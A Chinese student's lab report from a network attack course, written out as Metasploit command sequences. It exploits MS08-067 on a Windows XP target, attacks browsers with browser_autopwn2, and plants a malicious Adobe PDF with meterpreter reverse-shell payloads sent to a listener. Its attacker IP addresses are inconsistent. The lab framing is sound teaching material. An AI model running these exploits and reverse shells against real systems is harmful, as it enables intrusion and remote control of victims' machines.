2019-2020 - 2 网络对抗技术 20175235 Exp6 MSF基础应用
2019-2020-2 网络对抗技术 Exp6 MSF基础应用
20175235泽仁拉措
目录
一、实验过程
-
1.主动攻击实践
- ms08_067
-
2.针对浏览器的攻击
- browser_autopwn
-
3.针对客户端的攻击
- Adobe
-
4.成功应用任何一个辅助模块
1.主动攻击实践
①ms08_067
-
攻击机:kali
- IP:192.162.206.133
-
靶机:XP
- IP:192.168.206.136
-
步骤
-
启动
msfconsole
,输入search ms08-067
-
输入以下指令:
use exploit/windows/smb/ms08_067_netapi show payloads set payload generic/shell_reverse_tcp //tcp反向回连 set LHOST 192.168.182.133 //攻击机ip set LPORT 5235//攻击端口 set RHOST 192.168.182.136 //靶机ip,特定漏洞端口已经固定 set target 0 //自动选择目标系统类型,匹配度较高 exploit //攻击
-
2.针对浏览器的攻击
browser_autopwn
-
攻击机:kali
- IP:192.162.206.133
-
靶机:XP
-
IP:192.168.206.137
-
步骤
msfconsole use auxiliary/server/browser_autopwn2 set SRVHOST 192.168.206.133 set URIPATH auto show options exploit
-
开始攻击
-
成功
-
上图
3.针对客户端的攻击
Adobe
- 在攻击机kali输入msfconsole进入控制台,依次输入以下指令
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp //tcp反向回连
set LHOST 192.168.206.133 //攻击机ip
set LPORT 5235//攻击端口
set FILENAME zrlc5235.pdf //设置生成pdf文件的名字
exploit //攻击
-
将生成的pdf拷贝到靶机上
-
在kali中输入back,输入以下指令;
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //tcp反向连接
set LHOST 192.168.206.133//攻击机ip
set LPORT 5235 //攻击端口固定
exploit
4.成功应用任何一个辅助模块
web漏洞扫描
- 启动msfconsole.根据options设置相关参数,启动扫描
二、实验内容说明及基础问题回答
-
1.用自己的话解释什么是exploit,payload,encode.
- (1)exploit是执行渗透攻击,用来连接漏洞,将payload传输到目标靶机,进而实现对靶机的攻击。
- (2)payload是载荷。指的是用于执行的攻击的数据、代码。
- (3)encode是一个编码器,对payload进行包装处理,从而迷惑靶机达到免杀的效果。
-
2.离实战还缺些什么技术或步骤?
现在对漏洞的了解还很匮乏,更不要说利用漏洞去攻击了。而且实验都是在防火墙等安全防护都关闭的情况下进行的,对于日常其实实现起来应该比较困难。在利用后门程序之前也应该对其进行检测。
三、实验总结
这次实验主要就是按照步骤一步一步做,难度不是很大。